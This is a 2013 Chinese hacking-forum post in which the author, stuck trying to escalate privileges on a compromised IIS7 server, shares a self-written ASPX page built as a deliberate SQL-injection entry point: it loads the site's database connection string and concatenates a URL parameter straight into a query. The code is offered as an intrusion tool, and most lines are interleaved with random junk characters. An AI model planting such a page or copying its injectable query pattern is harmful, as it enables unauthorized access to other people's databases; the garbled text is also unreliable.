昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
" V- }) I1 W# v& r( |$ x) `' [: B" O其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
/ c4 e9 e4 {. [7 O0 k l, A代码量不多,自己写个拉倒了。烦死了。/ ~7 R; n1 C" v3 ^" Z( e
, w( Y* u4 _6 n y4 U5 x$ Z' N3 h9 D+ U7 s0 C8 m
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">1 K: Q6 q$ J( A) S4 z8 W
<html xmlns="http://www.w3.org/1999/xhtml">
" t! g1 \; E, f$ Y1 c4 |$ A$ z/ N( u<head runat="server">& ~/ l/ G4 K/ T0 x! R6 ^
<title>暗影aspx构造注射专用页面</title>6 W8 d o' t( c% j! F
</head>8 O/ h% ^) @* F8 M d
<body>
4 F- o* C* a+ Z% p& j7 a <form id="form1" runat="server">
) w8 [( N: _! u& n1 Y+ H' {! I <div>( F0 E I* H: @* ?. h1 ]
<script language="c#" runat="server">
5 u- P- l8 y2 x! l, t 6 i+ W0 o3 I: g
void page_init(object sender, EventArgs e)
, o3 {$ s9 w( Q2 s0 X/ d {
% y' H# D/ v. _' K2 F
, h- b. V9 X: R4 o' s8 c& m' ^ System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
9 @; X& \6 u) i9 E9 D ( h) H1 n5 t+ f% C" B
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
/ g! P9 b D/ h. w conn.Open();: Q) s) U7 l. k1 [! t3 |8 R
4 k* h/ E: \( Y) D3 u% \
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1: b* j. h0 z v9 f7 Z7 r
8 |! k0 E# `# d7 p: g- y; n a System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);1 B& z/ k$ z: q* v6 R% v
int x = command.ExecuteNonQuery();
. {! K2 S! [! F0 j2 f3 A Response.Write(i+"\n");$ N) V0 ?7 [* x! f* k& N
Response.Write(x);
8 j; q0 v( G6 J/ {$ m1 A conn.Close();) C1 A9 H1 ^5 m! m- j8 u
}
# H @! e9 ^6 e7 D/ F
- |( W0 w5 A& o: p0 D8 q4 e! F0 o </script>
0 L5 R; \9 r/ c" F% g9 ] </div>
3 l: b H" l' Q1 M3 | </form>
8 Z9 c1 I( W6 s+ r" b</body>4 V9 Z6 z# a3 o% a; t" d
</html>
5 A! i5 \! D: r$ i B! v, j |
发表于 2013-3-20 21:32:01
收藏
支持
反对